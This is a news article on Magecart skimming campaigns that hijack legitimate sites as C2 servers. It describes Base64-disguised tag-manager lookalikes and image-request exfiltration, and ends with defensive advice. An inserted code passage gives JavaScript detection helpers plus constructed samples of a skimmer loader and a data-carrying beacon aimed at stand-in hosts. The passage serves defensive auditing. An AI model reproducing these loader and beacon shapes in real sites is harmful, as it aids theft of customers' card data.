Magecart attacks exploit legitimate sites as C2 servers for credit card theft

Emre Çitak
Jun 5, 2023

A new breed of attacks known as Magecart attacks has emerged, targeting online stores to pilfer customers' credit card information and personal data during the checkout process.

These attacks employ sophisticated techniques, including the hijacking of legitimate websites to act as "makeshift" command and control (C2) servers, enabling hackers to inject and conceal credit card skimmers on targeted eCommerce platforms.

Magecart attacks hijack legitimate sites for malicious purposes

The Magecart attack technique involves hackers identifying vulnerable legitimate websites and exploiting them as hosts for their malicious code, using them as C2 servers for their operations. By leveraging reputable websites with a strong online presence, threat actors evade detection and bypass security measures, eliminating the need to set up their own infrastructure.

This strategy offers them a significant advantage in terms of concealment and enables them to reach a broader range of potential victims.

Magecart attacks exploit the vulnerabilities of sites to use them as C2 servers for their operations

One of the most concerning aspects of Magecart attacks is the stealthiness with which they operate. Many victimized organizations remain unaware of the breach for an extended period, sometimes surpassing a month. This prolonged period of undetected compromise underscores the craftiness and sophistication of these attacks.

Cybersecurity firm Akamai, which has been closely monitoring these campaigns, reveals that organizations in several countries, including the United States, the United Kingdom, Australia, Brazil, Peru, and Estonia, have fallen victim to these attacks.

Targeting common platforms

To initiate the attack, hackers exploit vulnerabilities within the targeted websites' digital commerce platforms, such as Magento, WooCommerce, WordPress, Shopify, and other commonly used platforms. They may also target weaknesses in third-party services employed by the websites.

Though the precise methods of breaching these websites remain undisclosed, previous research on similar campaigns suggests that hackers exploit known vulnerabilities within these systems.

Once a vulnerable platform is compromised, the attackers proceed to inject a small JavaScript snippet into the targeted eCommerce sites. This snippet fetches the malicious code from previously compromised legitimate websites, effectively integrating the credit card skimmers into the victims' platforms.

By camouflaging the skimmer with Base64 encoding and structuring it to resemble popular third-party services like Google Tag Manager or Facebook Pixel, the attackers successfully evade suspicion and detection.

The two faces of Magecart skimmers

Akamai's researchers have identified two variants of the credit card skimmers used in Magecart attacks. The first variant is heavily obfuscated, containing a list of CSS selectors specifically designed to target customer personally identifiable information (PII) and credit card details. Each targeted site has its custom-made CSS selectors, increasing the likelihood of successful data theft.

The second skimmer variant, while less protected, exposes indicators within its code, aiding Akamai in mapping the extent of the campaign and identifying additional victims.

Once the skimmers collect customers' data, it is transmitted to the attackers' servers via an HTTP request disguised as an IMG tag within the skimmer. To further conceal the stolen data, Base64 encoding is applied, minimizing the chances of victims discovering the breach.
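The two concealment traits described above (a Base64-encoded script URL behind a tag-manager lookalike, and Base64 data sent out in an image request) can be checked for during a site audit. The following is an added example, not code from the article or from Akamai's research; the allowlist, the hostnames, the function names and the sample inputs are all constructed assumptions.

```javascript
// Added example: defender-side audit helpers. The allowlist, hostnames and
// sample inputs are constructed for illustration, not taken from the campaign.
const ALLOWED_HOSTS = new Set([
  "shop.example", "www.googletagmanager.com", "connect.facebook.net",
]);

// Decode a Base64 token; return "" unless the result is printable ASCII.
function decodeB64(token) {
  const text = Buffer.from(token, "base64").toString("utf8");
  return /^[\x20-\x7e]+$/.test(text) ? text : "";
}

// Hostnames hidden in script source as Base64-encoded URLs, minus allowlisted ones.
function hiddenHosts(scriptSource) {
  const hosts = [];
  for (const token of scriptSource.match(/[A-Za-z0-9+\/]{16,}={0,2}/g) || []) {
    const m = decodeB64(token).match(/^(?:https?:)?\/\/([^\/:?#]+)/i);
    if (m && !ALLOWED_HOSTS.has(m[1].toLowerCase())) hosts.push(m[1].toLowerCase());
  }
  return hosts;
}

// True when an image request goes to a non-allowlisted host and carries a
// query value that is Base64 for readable text (the exfiltration shape above).
function isSuspiciousImageBeacon(requestUrl) {
  const url = new URL(requestUrl);
  if (ALLOWED_HOSTS.has(url.hostname)) return false;
  for (const raw of url.searchParams.values()) {
    const value = raw.replace(/ /g, "+"); // URL decoding turns "+" into a space
    if (value.length >= 16 && /^[A-Za-z0-9+\/]+={0,2}$/.test(value) && decodeB64(value)) {
      return true;
    }
  }
  return false;
}

// Constructed inputs: a tag-manager lookalike with an encoded script URL,
// and an image request carrying an encoded form value.
const b64 = (s) => Buffer.from(s).toString("base64");
const SAMPLE_INLINE = `// Google Tag Manager
var j = document.createElement("script");
j.src = atob("${b64("https://cdn.compromised.example/gtm.js")}");`;
const SAMPLE_BEACON = "https://img.compromised.example/p.gif?d=" +
  encodeURIComponent(b64("field=constructed-checkout-value"));

console.log(hiddenHosts(SAMPLE_INLINE));             // hosts to investigate
console.log(isSuspiciousImageBeacon(SAMPLE_BEACON)); // beacon verdict
```

Run the first check over inline scripts saved from checkout pages and the second over image request URLs from proxy or browser logs; a hit is a lead to investigate, since the allowlist decides what counts as unexpected.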

Magecart attacks use two methods to steal credit card information

How to protect your sites against Magecart attacks

Website owners can adopt several measures to defend against Magecart infections. Strengthening website admin accounts, applying timely security updates for CMS and plugins, and conducting regular security audits are vital steps in mitigating the risks posed by Magecart attacks.

By proactively addressing vulnerabilities and implementing robust security practices, organizations can reduce the likelihood of falling victim to these malicious campaigns.

Minimizing risks for customers

While the onus primarily falls on website owners to protect against Magecart attacks, customers can also take steps to minimize their risks. Opting for electronic payment methods, utilizing virtual cards, or setting charge limits on their credit cards can provide an additional layer of security and reduce the potential impact of data exposure.

